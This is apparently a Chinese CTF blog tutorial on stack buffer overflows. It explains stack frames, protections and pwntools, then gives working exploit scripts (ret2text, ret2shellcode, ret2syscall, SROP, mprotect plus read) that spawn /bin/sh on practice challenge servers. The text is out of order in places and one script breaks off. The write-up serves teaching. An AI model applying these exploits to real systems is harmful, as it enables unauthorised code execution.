先泄露栈地址，然后用栈把/bin/sh读入execve： #!/usr/bin/env python from pwn import * context(arch=&#39;amd64&#39;,os=&#39;linux&#39;,log_level=&#39;debug&#39;) #io = process(&#39;./ciscn_s_3&#39;) io = remote(&#39;node3.buuoj.cn&#39;,25931) vuln_add = 0x4004ED syscall = 0x400517 gadget = 0x4004DA payload = &#39;/bin/sh\\x00&#39;*2+p64(vuln_add)io.send(payload)io.recv(0x20) sh = u64(io.recv(8))-0x118 frame = SigreturnFrame() frame.rax = constants.SYS_execve frame.rdi = sh frame.rsi = 0x0 frame.rdx = 0x0 frame.rsp = sh frame.rip = syscall payload = &#39;/bin/sh\\x00&#39;*2 + p64(gadget) + p64(syscall) + str(frame) io.sendline(payload) io.interactive() mprotect使用 int mprotect(const void *start, size_t len, int prot); 含义：从start开始长度为len的内存区的保护属性修改为prot指定的值，prot的值和linux的权限属性值相同。 get_started_3dsctf_2016 get_flag函数在远程根本不能用。 所以另辟蹊径，搜索mprotect函数，可以利用mprotect在bss上面写入可执行权限，之后用read函数在bss上写入shellcode。 payload： #!/usr/bin/env python from pwn import * context.log_level = &#39;debug&#39; io = remote(&#39;node3.buuoj.cn&#39;,28342) elf = ELF(&#39;./get_started_3dsctf_2016&#39;) pop_3_add = 0x0809e4c5 rw_add = 0x080eb000 payload = &#39;a&#39;*0x38 + p32(elf.symbols[&#39;mprotect&#39;]) + p32(pop_3_add) + p32(rw_add) + p32(0x1000) + p32(0x7) + p32(elf.symbols[&#39;read&#39;]) + p32(pop_3_add) + p32(0x0) + p32(0x080ebf80) +p32(0x200) + p32(0x080ebf80) io.sendline(payload) io.sendline(asm(shellcraft.sh(),arch=&#39;i386&#39;,os=&#39;linux&#39;)) io.interactive() 放下狠话：可能还会更。 有了！有了！2020-05-09有后续了！ROP tricks 0xdeadbeef参考文章 [漏洞分析] 栈基础 &amp; 栈溢出 &amp; 栈溢出进阶 https://www.52pojie.cn/thread-974510-1-1.html 栈溢出从入门到入狱 https://aidaip.github.io/binary/2019/03/16/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%85%A5%E7%8B%B1.html 栈溢出原理 https://wiki.x10sec.org/pwn/stackoverflow/stackoverflow_basic/ 基本 ROP https://wiki.x10sec.org/pwn/stackoverflow/basic_rop/ 高级ROP https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/ checksec及其包含的保护机制 https://www.jianshu.com/p/8a9ef7205632","@type":"BlogPosting","@context":"https://schema.org"}</script> <!-- End Jekyll SEO tag --><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link rel="alternate" href="/feed.xml" title="Surager's blog" type="application/rss+xml" /><link rel="apple-touch-icon-precomposed" href="/static/assets/img/landing/avatar.jpg" /><link rel="shortcut icon" href="/static/assets/img/landing/avatar.jpg" /><link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/gh/poole/lanyon@v1.1.0/public/css/poole.min.css,gh/poole/lanyon@v1.1.0/public/css/lanyon.min.css,gh/poole/lanyon@v1.1.0/public/css/syntax.min.css" /><link rel="stylesheet" href="/static/assets/script/admonitions.css" /> <script async="async" src="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/js/all.min.js" ></script> <script src='https://zz.bdstatic.com/linksubmit/push.js' async="async" ></script><style> .wrap { transition-property: width,background-size,transform; transition-duration: .3s; transition-timing-function: ease-in-out; min-height: 100%; display: inline-block; background-size: 100% auto; background-position: 0% 0%; background-repeat: no-repeat; background-attachment: fixed; background-image: url(/assets/image/74559485_p1.webp); } @media (min-aspect-ratio: 2400/1850) { .wrap { background-image: url(/assets/image/71932901_p0.webp); } } .sidebar-overlay #sidebar-checkbox:checked ~ .wrap { width: calc(100% - 14rem); background-size: calc(100% - 14rem) auto; transform: translateX(14rem); } .layout-reverse.sidebar-overlay #sidebar-checkbox:checked ~ .wrap { transform: translateX(0); }</style><style> .sidebar, html, h1, h2, h3, h4, h5, h6 { font-family: "Fira Code", Consolas, PingFang SC, Menlo, Monaco, "Courier New", Microsoft JhengHei, monospace; }</style><style> h1, h2, h3, h4, h5, h6 { font-weight: bold; }</style><style> .post h1, .post h2, .post h3, .post h4, .post h5, .post h6 { font-weight: 550; }</style><style> img { display: inline-block; margin: 0; }</style><style> ::-webkit-scrollbar { width: 3px; height: 3px; } ::-webkit-scrollbar-thumb { background-image: linear-gradient(45deg, Cyan 0%, Magenta 50%, Yellow 100%); }</style><style> ::selection { color: White; background: Black; }</style><body class="theme-base-07 sidebar-overlay"> <!-- Target for toggling the sidebar `.sidebar-checkbox` is for regular styles, `#sidebar-checkbox` for behavior. --> <input type="checkbox" class="sidebar-checkbox" id="sidebar-checkbox" /> <!-- Toggleable sidebar --><div class="sidebar" id="sidebar"><div class="sidebar-item"><div class="effect effect-right_to_left"> <img class="effect-img" src="/static/assets/img/landing/avatar.jpg" alt="img" /><div class="effect-info"> 19计算机专业在读<br/> Blue-Whale<br/> V&N<br/> 龙鸣PWN手<br/> 希望你能在这里学到东西<br/> <a href="mailto:surager2019@gmail.com"> <i class="fas fa-envelope"></i> </a> <a href="https://github.com/Surager"> <i class="fab fa-github"></i> </a> <a href="https://surager.pub/feed.xml"> <i class="fas fa-rss"></i> </a> <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=100% height=52 src="https://music.163.com/outchain/player?type=2&id=1453894413&auto=0&height=32" ></iframe></div></div></div><nav class="sidebar-nav"> <a class="sidebar-nav-item" href="/"> <i class="fas fa-home fa-fw"></i> 首页 </a> <a class="sidebar-nav-item" href="/comments/"> <i class="fas fa-comments fa-fw"></i> 留言 </a> <a class="sidebar-nav-item" href="/tags/"> <i class="fas fa-tags fa-fw"></i> 标签 </a> <a class="sidebar-nav-item" href="/archive/"> <i class="fas fa-archive fa-fw"></i> 归档 </a> <a class="sidebar-nav-item" href="/about/"> <i class="fas fa-address-card fa-fw"></i> 关于 </a></nav><div class="sidebar-item"><style> #sidebar-search-input { background: none; border: none; color: White; width: 100%; } #sidebar-search-results-container { overflow: auto auto; max-height: 66.6vh; }</style><input id="sidebar-search-input" placeholder="搜索博文" /><ol id="sidebar-search-results-container" ></ol><script src='https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.11/dest/simple-jekyll-search.min.js' async='async' onload=' SimpleJekyllSearch({ json: "/assets/simple-jekyll-search/search.json", searchInput: document.getElementById("sidebar-search-input"), resultsContainer: document.getElementById("sidebar-search-results-container"), searchResultTemplate: `<li><a href="{url}">{title}</a>`, limit: 999, fuzzy: true })' ></script><style> #toc { overflow: auto auto; max-height: 66.6vh; }</style><ol id="toc"><li><a href="#%E6%A0%88%E6%BA%A2%E5%87%BA">栈溢出</a><ol><li><a href="#0x0%E6%A0%88%E5%9F%BA%E7%A1%80">0x0栈基础</a><ol><li><a href="#%E5%9F%BA%E6%9C%AC%E6%93%8D%E4%BD%9C">基本操作：</a><li><a href="#%E4%BC%A0%E5%8F%82">传参</a></ol><li><a href="#0x10%E6%A0%88%E6%BA%A2%E5%87%BA">0x10栈溢出</a><ol><li><a href="#%E6%A0%88%E6%BA%A2%E5%87%BA%E8%BE%BE%E5%88%B0%E7%9A%84%E7%9B%AE%E7%9A%84">栈溢出达到的目的</a><li><a href="#%E6%A0%88%E6%BA%A2%E5%87%BA%E6%80%9D%E8%B7%AF">栈溢出思路</a></ol><li><a href="#0x20%E5%9F%BA%E6%9C%AC%E5%B7%A5%E5%85%B7">0x20基本工具</a><li><a href="#0x30%E8%B0%83%E8%AF%95%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90">0x30调试（实例分析）</a><ol><li><a href="#nc%E7%AD%BE%E5%88%B0">nc——签到</a><li><a href="#ret2text%E6%A2%A6%E5%BC%80%E5%A7%8B%E7%9A%84%E5%9C%B0%E6%96%B9">ret2text——梦开始的地方</a><ol><li><a href="#jarvisoj_level0">jarvisoj_level0</a><li><a href="#ciscn_2019_n_1">ciscn_2019_n_1</a></ol><li><a href="#ret2shellcode%E5%B7%A7%E5%8F%96">ret2shellcode——巧取</a><ol><li><a href="#ciscn_2019_n_5">ciscn_2019_n_5</a></ol><li><a href="#ret2syscall%E8%B4%A8%E7%9A%84%E6%8F%90%E5%8D%87">ret2syscall——质的提升</a><ol><li><a href="#stackoverflow_ret2syscall_x64">StackOverflow_ret2syscall_x64</a></ol><li><a href="#ret2libc%E5%BD%BB%E5%BA%95%E6%8C%A3%E8%84%B1%E6%9D%9F%E7%BC%9A">ret2libc——彻底挣脱束缚</a><ol><li><a href="#stackoverflow_ret2libc">StackOverflow_ret2libc</a></ol><li><a href="#srop">SROP</a><li><a href="#mprotect%E4%BD%BF%E7%94%A8">mprotect使用</a><ol><li><a href="#get_started_3dsctf_2016">get_started_3dsctf_2016</a></ol></ol><li><a href="#0xdeadbeef%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0">0xdeadbeef参考文章</a></ol></ol><style> .sidebar-checkbox { display: none; } .sidebar-toggle { position: fixed; }</style><style> .sidebar { overflow: scroll; min-height: 101%; }</style><style> .effect { margin: 1rem; perspective: 900px; } .effect-info { text-align: center; backface-visibility: hidden; position: absolute; top: 0; transform-style: preserve-3d; } .effect-img { z-index: 11; width: 100%; height: 100%; position: relative; transition: all 0.5s ease-in-out; } .effect-img:before { position: absolute; display: block; } .effect-right_to_left .effect-img { transform-origin: 0% 50%; } .effect-right_to_left:hover .effect-img { transform: rotate3d(0, 1, 0, -180deg); }</style><div> <i class="fas fa-cog fa-spin fa-fw"></i> <span id="run_time_day"> <i class="fas fa-spinner fa-pulse"></i> </span>天 <span id="run_time_hour"> <i class="fas fa-spinner fa-pulse"></i> </span>时 <span id="run_time_minute"> <i class="fas fa-spinner fa-pulse"></i> </span>分 <span id="run_time_second"> <i class="fas fa-spinner fa-pulse"></i> </span>秒 <script> setInterval(function (d,h,m,s,b) { function setzero(i) { return i < 10 ? "0" + i : i; } let BirthDay = new Date(b); let today = new Date(); let timeold = (today.getTime() - BirthDay.getTime()); let sectimeold = timeold / 1000; let secondsold = Math.floor(sectimeold); let msPerDay = 24 * 60 * 60 * 1000; let e_daysold = timeold / msPerDay; let daysold = Math.floor(e_daysold); let e_hrsold = (e_daysold - daysold) * 24; let hrsold = Math.floor(e_hrsold); let e_minsold = (e_hrsold - hrsold) * 60; let minsold = Math.floor((e_hrsold - hrsold) * 60); let seconds = Math.floor((e_minsold - minsold) * 60); d.textContent = daysold; h.textContent = setzero(hrsold); m.textContent = setzero(minsold); s.textContent = setzero(seconds); }, 1000, document.getElementById("run_time_day"), document.getElementById("run_time_hour"), document.getElementById("run_time_minute"), document.getElementById("run_time_second"), "10/27/2019 00:00:00")// 这是我第一篇CSDN博客的时间 </script></div><div><div> <i class="fas fa-eye fa-fw"></i> <span id="busuanzi_value_page_pv"> <i class="fas fa-spinner fa-pulse"></i> </span>次</div><div> <i class="fas fa-paw fa-fw"></i> <span id="busuanzi_value_site_pv"> <i class="fas fa-spinner fa-pulse"></i> </span>枚</div><div> <i class="fas fa-user-friends fa-fw"></i> <span id="busuanzi_value_site_uv"> <i class="fas fa-spinner fa-pulse"></i> </span>人</div><script src='https://cdn.jsdelivr.net/npm/busuanzi@2.3.0' async='async' ></script></div><div> <i class="fas fa-thumbs-up fa-fw"></i> <a href="https://jekyll-theme-WuK.wu-kan.cn"> jekyll-theme-WuK </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://aidaip.github.io"> AiDai </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://coinc1dens.github.io/"> Coin哥哥 </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://www.freejishu.com/"> freejishu的美丽世界 </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://hitcxy.com"> pikachu's Blog </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://n0vice.gitee.io/"> N0vice </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://phuker.github.io/"> 腾汛新闻 </a></div><div> <i class="fas fa-copyright fa-fw"></i> 2019-2021 Surager</div></div></div><!-- Wrap is the content to shift when toggling the sidebar. We wrap the content to avoid any CSS collisions with our real content. --><div class="wrap"><style> pre { max-height: 66.6vh; overflow: auto; }</style><style> .container { min-width: 66.6%; }</style><style> .container.content { padding-top: 1rem; padding-bottom: 1px; margin-top: 1.5rem; margin-bottom: 1.5rem; border-radius:10px; box-shadow:0px 0px 0px 3px #bb0a0a, 0px 0px 0px 6px #2e56bf, 0px 0px 0px 9px #ea982e; background-color: rgba(255,255,255,0.95); animation-duration: 2s; animation-name: fadeIn; } .masthead{ padding-top: 1rem; padding-bottom: 1rem; margin-bottom: 1.5rem; box-shadow: 0 0 5rem rgba(0, 0, 0, 0.1); background-color: rgba(255,255,255,0.99); animation-duration: 2s; animation-name: fadeIn; } @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } }</style><div class="container content"><div class="page"><div class="post"> <span class="post-date"> <i class="fas fa-calendar-day fa-fw"></i> Time: 2020-02-18 <i class="fas fa-tag fa-fw"></i> Tags: binary <br/> <i class="fas fa-link fa-fw"></i> Link: <a href="/_posts/2020-02-18-%E6%A0%88%E6%BA%A2%E5%87%BA-%E9%9D%B6%E5%90%91%E6%89%93%E5%87%BB/"> 栈溢出：靶向打击 </a> </span><h1 id="栈溢出">栈溢出</h1><h2 id="0x0栈基础">0x0栈基础</h2><p>堆栈(stack)是一种数据结构。堆栈都是一种数据项按序排列的数据结构，只能在一端(称为栈顶(top))对数据项进行插入和删除。</p><p>堆栈对于面向过程的编程语言来说是非常重要的。函数调用经常嵌套，在同一时刻，堆栈中会有多个函数的信息。每个未完成运行的函数占用一个独立的连续区域，称作栈帧。可以说，没有栈就没有函数。</p><p>需要注意的是</p><ol><li>其操作主要有压栈(push)与出栈(pop)、调用(call)、离开(leave)与返回(ret)等操作。<li><strong>程序的栈是从进程地址空间的高地址向低地址增长的</strong>，数据是从低地址向高地址存放的 。</ol><h3 id="基本操作"><strong>基本操作：</strong></h3><p>开栈的基本操作如下：</p><pre><code class="language-assembly">push ebp                ;保存旧栈帧的底部,在func执行完成后在pop ebp
mov ebp,esp         ;设置新栈帧的底部
sub esp,xxx         ;设置新栈帧的顶部
. . .
</code></pre><p><img src="\assets\image\006nFhrCly1g3vv2v485sj30mw0bn0tj.jpg" alt="函数调用时栈的情况" /></p><p>参数入栈时，将参数从右向左依次压入系统栈，然后将当前代码段call指令的下一条指令的地址填入返回地址处，然后去执行call的代码。然后保存ebp，开栈。若函数有返回值，则一般将返回值存入eax，然后leave，ret。这就是函数调用(call)的全过程。</p><h3 id="传参"><strong>传参</strong></h3><p>需要注意的是，调用一个函数的时候，需要传参。x86和x64的传参方式有所不同。具体如下:</p><p>x86:</p><p>例如要调用一个read函数，原型为：</p><pre><code class="language-c">read(0,&amp;buf,0x100);
</code></pre><p>那么我们只需要将参数传入栈中，x86平台通过栈传递参数：</p><pre><code class="language-assembly">push  100h   	;nbytes
push  eax   	;buf
push  0      	;fd
call  _read
</code></pre><p>x64:</p><p>x64平台通过寄存器和栈传参，前六个参数分别存入rdi,rsi,rdx,rcx,r8,r9，再多就存入栈中。</p><pre><code class="language-assembly">mov   rdx,100h	    ;nbytes
lea   rsi,s1		;buf
mov   rdi,0		    ;fd
call  _read
</code></pre><p>在进行栈溢出时，我们要寻找<code>pop rdi;ret</code>这样的片段进行传参，用到一种叫rop的技术。这里介绍一下一个寻找rop的指令：</p><p><code>ROPgadget --binary ./filename --only "pop|ret"</code></p><p>ROP(Return Oriented Programming)，其主要思想是在<strong>栈缓冲区溢出的基础上，利用程序中已有的小片段( gadgets )来改变某些寄存器或者变量的值，从而控制程序的执行流程。</strong>所谓gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。</p><h2 id="0x10栈溢出"><strong>0x10栈溢出</strong></h2><p>栈溢出指的是程序向栈中某个变量写入的字节数超过了这个变量本身申请的字节数，因而导致栈中与之相邻的变量的值被改变。</p><h3 id="栈溢出达到的目的"><strong>栈溢出达到的目的</strong></h3><ul><li>破坏程序内存结构<li>执行system(/bin/sh)<li>执行shellcode</ul><h3 id="栈溢出思路"><strong>栈溢出思路</strong></h3><ul><li>找到危险函数：</ul><pre><code>系统级函数：system、execve
输入函数：read、scanf、gets、vscanf
输出函数(泄露地址)：sprintf、puts、printf
</code></pre><ul><li>判断填充的padding</ul><pre><code>1. 计算我们所要操作的地址和所要覆盖的地址的距离
2. IDA静态分析中常见的三种索引方式
	a. 相对于栈基地址的索引,通过查看EBP相对偏移获得 char name[32]; [esp+0h] [ebp-28h]  ==&gt; 0x28+0x4
	b. 相对于栈顶指针的索引,需要加上ESP到EBP的偏移，然后转换为a方式
	c. 直接地址索引,相当于直接给出了地址
</code></pre><ul><li>覆盖内容</ul><pre><code>1. 覆盖返回地址
2. 覆盖某个变量的值。
</code></pre><ul><li>利用成功</ul><pre><code>打开交互，然后cat flag吧。
</code></pre><h2 id="0x20基本工具"><strong>0x20基本工具</strong></h2><ul><li>file工具</ul><p>没啥好说的，主要是看这个文件的属性的，重点关注位数和链接方式（详情请见<a href="https://surager.github.io/_posts/2020-01-20-%E9%9D%99%E6%80%81%E9%93%BE%E6%8E%A5/">静态链接</a>,<a href="https://surager.github.io/_posts/2020-01-26-%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5/">动态链接</a>）：</p><pre><code>babyrop2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=fab931b976ae2ff40aa1f5d1926518a0a31a8fd7, not stripped
</code></pre><p>如上，ELF——ELF文件，64-bit——64位，dynamically linked——动态链接。</p><ul><li>checksec工具</ul><pre><code>[*] '/mnt/e/wsl/babyrop2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
</code></pre><ul><li><ul><li>arch：程序位数<li>RELRO：设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号，从而减少对GOT（Global Offset Table）攻击。RELRO为” Partial RELRO”，说明我们对GOT表具有写权限。<li>Stack：开启则无法直接覆盖EIP让程序任意跳转，跳转后会进行cookie校验；但这项保护可以被绕过<li>NX：NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。<li>PIE：开启在每次程序运行地址都会变化，未开启则返回值括号内是程序的基址（见surager博文《动态链接》）</ul><li>pwntools</ul><pre><code class="language-python"># Pwntools环境预设
from pwn import *
context.arch = "amd64/i386"                             #指定系统架构
context.terminal = ["tmux,"splitw","-h"]     #指定分屏终端
context.os = "linux"                                     #context用于预设环境

# 库信息
elf = ELF('./PWNME')                        # ELF载入当前程序的ELF，以获取符号表，代码段，段地址，plt，got信息
libc = ELF('lib/i386-linux-gnu/libc-2.23.so')     # 载入libc的库，可以通过vmmap查看
/*
首先使用ELF()获取文件的句柄，然后使用这个句柄调用函数,如
&gt;&gt;&gt; e = ELF('/bin/cat')
&gt;&gt;&gt; print hex(e.address)    # 文件装载的基地址
&gt;&gt;&gt; print hex(e.symbols['write']) # plt中write函数地址
&gt;&gt;&gt; print hex(e.got['write'])     # GOT表中write符号的地址
&gt;&gt;&gt; print hex(e.plt['write'])       # PLT表中write符号的地址                    
*/                                       

# Pwntools通信                    
p = process('./pwnme')                      # 本地 process与程序交互
r = remote('exploitme.example.com',3333)          # 远程

# 交互
recv()          # 接收数据,一直接收
recv(numb=4096,timeout=default) # 指定接收字节数与超时时间                    
recvuntil("111")     # 接收到111结束，可以裁剪，如.[1:4]
recbline()      # 接收到换行结束
recvline(n)     # 接收到n个换行结束
recvall()           # 接收到EOF
recvrepeat(timeout=default) #接收到EOF或timeout
send(data)      # 发送数据
sendline(data)      # 发送一行数据，在末尾会加\n
sendlineafter(delims,data) #   在程序接收到delims再发送data                  
r.send(asm(shellcraft.sh()))                          # 信息通信交互                                       
r.interactive()                              # send payload后接收当前的shell

# 字符串与地址的转换
p64(),p32()  #将字符串转化为ascii字节流
u64(),u32()  #将ascii的字节流解包为字符串地址           
</code></pre><ul><li>IDA</ul><p>自己看书</p><h2 id="0x30调试实例分析"><strong>0x30调试（实例分析）</strong></h2><h3 id="nc签到">nc——签到</h3><p>nc是netcat的简写，有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用，被设计为一个简单、可靠的网络工具。</p><p>一般其程序为：</p><pre><code class="language-c">int main()
{
	system("/bin/sh");
	return 0;
}
</code></pre><p>system是执行系统指令，/bin/sh在自己电脑里输入一下就知道是啥了。</p><p>相似的函数还有execve(“/bin/sh”,0,0);</p><p>实战:</p><pre><code>surager@KaliWindows:~/wsl$ nc node3.buuoj.cn 27422
cat flag
flag{0a7da57a-a356-4745-96a6-87bfc4b5b86c}
</code></pre><h3 id="ret2text梦开始的地方"><strong>ret2text——梦开始的地方</strong></h3><blockquote><p>通过构造payload=padding+address_system(‘/bin/sh’)来完成漏洞利用</p></blockquote><h4 id="jarvisoj_level0"><strong>jarvisoj_level0</strong></h4><p>保护机制：</p><pre><code class="language-shell">$ checksec level0
	Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
</code></pre><p>程序只开启了NX保护。</p><pre><code class="language-c">int callsystem()
{
  return system("/bin/sh");
}

ssize_t vulnerable_function()
{
  char buf; // [rsp+0h] [rbp-80h]

  return read(0, &amp;buf, 0x200uLL);
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  write(1, "Hello, World\n", 0xDuLL);
  return vulnerable_function();
}
</code></pre><p>栈相对于rbp的距离为0x80，而read读入了0x200个字符，存在栈溢出。</p><p>padding = ‘a’*0x80+’a’*0x8</p><p>然后找到callsystem的地址，填入padding之后：</p><pre><code class="language-python">#!/usr/bin/env python 
from pwn import *
context.log_level = 'debug'
io=remote('node3.buuoj.cn',25555)
payload='a'*128+'aaaaaaaa'+p64(0x40059a)
io.sendline(payload)
io.interactive()
</code></pre><pre><code>surager@KaliWindows:~/wsl$ ./level0.py
[+] Opening connection to node3.buuoj.cn on port 29296: Done
[*] Switching to interactive mode
Hello, World
$ cat flag
flag{************************************}
</code></pre><h4 id="ciscn_2019_n_1"><strong>ciscn_2019_n_1</strong></h4><p>保护机制：</p><pre><code class="language-sh">$ checksec ciscn_2019_n_1
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
</code></pre><p>程序开启了NX保护。</p><pre><code class="language-c">int func()
{
  int result; // eax
  __int64 v1; // [rsp+0h] [rbp-30h]
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(&amp;v1);
  if ( v2 == 11.28125 )
    result = system("cat /flag");
  else
    result = puts("Its value should be 11.28125");
  return result;
}
</code></pre><p>gets并没有限制读入字符的个数，因此可以覆盖返回地址进行跳转，查看汇编得到system(“cat /flag”);地址</p><p>exp:</p><pre><code class="language-python">from pwn import *
io=remote('node3.buuoj.cn',29966)
payload='a'*0x30+'a'*8+p64(0x4006be)
io.sendline(payload)
io.interactive()
</code></pre><h3 id="ret2shellcode巧取"><strong>ret2shellcode——巧取</strong></h3><h4 id="ciscn_2019_n_5"><strong>ciscn_2019_n_5</strong></h4><p>保护机制：</p><pre><code class="language-sh">$ checksec ciscn_2019_n_5
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
</code></pre><p>可以看出，几乎没有开任何保护，而且有可读可写可执行的段。我们可以向RWX段读入shellcode，从而获取shell。</p><pre><code class="language-c">int __cdecl main(int argc, const char **argv, const char **envp)
{
  char text[30]; // [rsp+0h] [rbp-20h]

  setvbuf(stdout, 0LL, 2, 0LL);
  puts("tell me your name");
  read(0, name, 0x64uLL);
  puts("wow~ nice name!");
  puts("What do you want to say to me?");
  gets((__int64)text, (__int64)name);
  return 0;
}
</code></pre><p>查看变量name，发现在bss段</p><pre><code class="language-assembly">.bss:0000000000601080 ; char name[100]
.bss:0000000000601080 name            db 64h dup(?)           ; DATA XREF: main+35↑o
</code></pre><p>我们用gdb在main处下断点，用vmmap查看信息：</p><pre><code>gdb-peda$ b main
Breakpoint 1 at 0x40063e
gdb-peda$ r
[----------------------------------registers-----------------------------------]
RAX: 0x400636 --&gt; 0x20ec8348e5894855
RBX: 0x0
RCX: 0x4006b0 --&gt; 0x41ff894156415741
RDX: 0x7ffffffee1a8 --&gt; 0x7ffffffee3e9 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
RSI: 0x7ffffffee198 --&gt; 0x7ffffffee3cf ("/mnt/e/wsl/ciscn_2019_n_5")
RDI: 0x1
RBP: 0x7ffffffee0b0 --&gt; 0x4006b0 --&gt; 0x41ff894156415741
RSP: 0x7ffffffee090 --&gt; 0x4006b0 --&gt; 0x41ff894156415741
RIP: 0x40063e --&gt; 0xb900200a1b058b48
R8 : 0x7fffff3ecd80 --&gt; 0x0
R9 : 0x7fffff3ecd80 --&gt; 0x0
R10: 0x3
R11: 0x7fffff021ab0 (&lt;__libc_start_main&gt;:       push   r13)
R12: 0x400540 --&gt; 0x89485ed18949ed31
R13: 0x7ffffffee190 --&gt; 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400636 &lt;main&gt;:     push   rbp
   0x400637 &lt;main+1&gt;:   mov    rbp,rsp
   0x40063a &lt;main+4&gt;:   sub    rsp,0x20=&gt; 0x40063e &lt;main+8&gt;:
    mov    rax,QWORD PTR [rip+0x200a1b]        # 0x601060 &lt;stdout@@GLIBC_2.2.5&gt;
   0x400645 &lt;main+15&gt;:  mov    ecx,0x0
   0x40064a &lt;main+20&gt;:  mov    edx,0x2
   0x40064f &lt;main+25&gt;:  mov    esi,0x0
   0x400654 &lt;main+30&gt;:  mov    rdi,rax
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffee090 --&gt; 0x4006b0 --&gt; 0x41ff894156415741
0008| 0x7ffffffee098 --&gt; 0x400540 --&gt; 0x89485ed18949ed31
0016| 0x7ffffffee0a0 --&gt; 0x7ffffffee190 --&gt; 0x1
0024| 0x7ffffffee0a8 --&gt; 0x0
0032| 0x7ffffffee0b0 --&gt; 0x4006b0 --&gt; 0x41ff894156415741
0040| 0x7ffffffee0b8 --&gt; 0x7fffff021b97 (&lt;__libc_start_main+231&gt;:       mov    edi,eax) 
0048| 0x7ffffffee0c0 --&gt; 0x1
0056| 0x7ffffffee0c8 --&gt; 0x7ffffffee198 --&gt; 0x7ffffffee3cf ("/mnt/e/wsl/ciscn_2019_n_5")
[------------------------------------------------------------------------------]        
Legend: code, data, rodata, value

Breakpoint 1, main () at pwn.c:7
gdb-peda$ vmmap
</code></pre><p>发现bss段：</p><pre><code>0x00601000         0x00602000         rwxp      /mnt/e/wsl/ciscn_2019_n_5
</code></pre><p>所以我们直接将shellcode写入bss段然后执行。</p><pre><code class="language-python">#!/usr/bin/env python
from pwn import *
context(arch='amd64',os='linux',log_level='debug') #注意要设置context
io = remote('node3.buuoj.cn',26176)
bss = 0x601080
io.recvuntil('name\n')
shellcode = asm(shellcraft.sh())
io.send(shellcode)
io.recvuntil('?\n')
payload = 'a'*0x20 + 'a'*0x8 + p64(bss)
io.sendline(payload)
io.interactive()
</code></pre><h3 id="ret2syscall质的提升"><strong>ret2syscall——质的提升</strong></h3><p>x86的execve函数系统调用号为0xb，x64平台的execve系统调用号为0x3b。用ax寄存器存储系统调用号。相当于传递了一个参数。</p><h4 id="stackoverflow_ret2syscall_x64"><strong>StackOverflow_ret2syscall_x64</strong></h4><pre><code class="language-c">__int64 sub_400B60()
{
  char buf; // [rsp+0h] [rbp-400h]

  sub_410390((__int64)"Any last words?");
  sub_4498A0(0, &amp;buf, 0x7D0uLL);
  return sub_40F710((unsigned __int64)"This will be the last thing that you say: %s\n");
}
</code></pre><pre><code>surager@KaliWindows:~/wsl$ ROPgadget --binary ./ret2syscall_x64 --only "syscall"

Gadgets information
============================================================

0x000000000040129c : syscall

Unique gadgets found: 1
</code></pre><p>找到了syscall，可以把/bin/sh读入bss段，然后传给execve，构造execve(“/bin/sh”,0,0);便可以得到shell。</p><p>需要注意，构造payload时，当要跳转到一个函数执行时，紧跟着的一个参数是这个函数的返回地址，例如：</p><p><code>padding+p64(read_add)+p64(return_add)+p64(0)+p64(bss_add)+p64(0x100)</code></p><p>这个payload会先覆盖返回地址为read的地址，然后将<code>p64(return_add)</code>后面的三个作为参数。read执行完毕之后回到return_add这个地址</p><p>exp：</p><pre><code class="language-python">#!/usr/bin/env python
from pwn import *
context.log_level = 'debug'

io = remote('118.190.133.9',20004)
elf = ELF('./ret2syscall_x64')      #可以自动获取文件中的某些地址
pop_rax_add = 0x0000000000415664
pop_rdi_add = 0x0000000000400686
pop_rsi_add = 0x00000000004101f3
pop_rdx_add = 0x00000000004498b5    #这四个地址通过ROPgadget找到
main_add = 0x400B60
read_add = 0x4498AA
bss_add = elf.bss()					#得到bss的地址
syscall = 0x000000000040129c
